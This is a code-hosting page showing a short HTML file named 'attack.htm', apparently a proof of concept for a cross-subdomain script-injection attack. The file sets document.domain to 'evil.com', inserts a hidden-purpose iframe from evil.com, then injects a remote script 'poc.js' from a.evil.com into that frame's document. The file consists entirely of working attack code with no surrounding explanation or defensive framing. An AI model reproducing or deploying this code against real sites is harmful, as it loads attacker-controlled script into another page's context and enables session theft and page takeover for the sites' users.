-
Notifications
You must be signed in to change notification settings - Fork 7
/
attack.htm
35 lines (28 loc) · 797 Bytes
/
attack.htm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
</head>
<body></body>
<script>
document.domain="evil.com";
function inj_iframe(src,onload){
/*注入框架*/
var o = document.createElement("iframe");
o.src = src;
o.width = o.height = 300;
o.id="proxy";
if(onload) o.onload = onload;
document.getElementsByTagName("body")[0].appendChild(o);
return o;
}
function inject(){
var d = document.getElementById("proxy").contentDocument || document.getElementById("proxy").contentWindow.document
//d.write('123');
var x = d.createElement("SCRIPT");
x.src ="http://a.evil.com/proxy/poc.js";
x.defer = true;
d.getElementsByTagName("HEAD")[0].appendChild(x);
}
var o = inj_iframe("http://evil.com/proxy/proxy.htm",inject);
</script>
</html>